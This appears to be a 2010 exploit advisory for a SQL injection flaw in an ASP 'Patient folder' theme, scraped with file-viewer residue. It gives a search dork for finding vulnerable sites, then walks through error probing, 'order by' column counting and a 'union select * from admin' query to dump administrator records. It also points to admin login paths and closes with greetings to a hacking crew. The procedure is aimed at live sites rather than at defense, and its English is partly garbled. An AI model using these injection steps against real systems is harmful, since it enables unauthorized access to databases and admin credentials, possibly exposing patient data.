59 lines
No EOL
1.8 KiB
Text
59 lines
No EOL
1.8 KiB
Text
============================================================
|
|
Patient folder (THEME ASP) Local SQL Injection Vulnerability
|
|
============================================================
|
|
|
|
-----------------------------------
|
|
By: SA H4x0r -
|
|
Emails: ww0@hotmail.com -
|
|
Date: 2010/05/31 -
|
|
-----------------------------------
|
|
=====================================================================
|
|
|
|
Search: "profil.asp?id=" OR "asp?id="
|
|
Author: SA H4x0r
|
|
Contact: ww0[at]hotmail.com
|
|
Data: 2010-05-31
|
|
=====================================================================
|
|
|
|
Description:
|
|
|
|
Inject script asp to tell the script to take them infected ..
|
|
|
|
=====================================================================
|
|
|
|
--=[ Vuln C0de ]=-
|
|
|
|
[-] com/profil.asp?id
|
|
[-] xxx/xxxxxx.asp?id
|
|
|
|
-----------------------------------------------------------------------------------------
|
|
|
|
Directions:
|
|
|
|
http://[Site].com/profil.asp?id=1' <<< To show us the site involved or not
|
|
|
|
http://[Site].com/profil.asp?id=1 having 1=1 << Here is a guide on the site downstream
|
|
|
|
Look:
|
|
|
|
[Microsoft][ODBC Microsoft Access Driver] HAVING clause (1=1) without grouping or aggregation.
|
|
|
|
okey ;)
|
|
|
|
http://[Site].com/profil.asp?id=1 order by 1
|
|
|
|
http://[Site].com/profil.asp?id=1 union select * from admin
|
|
|
|
Control panel: http://[Site].com/admin "OR" http://[Site].com/login
|
|
|
|
-----------------------------------------------------------------------------------------
|
|
|
|
-=[ P0C ]=-
|
|
|
|
http://127.0.0.1/profile/profil.asp?id=[SQL ASP]
|
|
|
|
http://127.0.0.1/.asp?id=[SQL ASP]
|
|
|
|
=========================| -=[ E0F ]=- |=========================
|
|
|
|
Gr33t'z; Dmar Skood - VirUs_Ra3ch - Mr_QlQ - v4 Team - XP10_HackEr |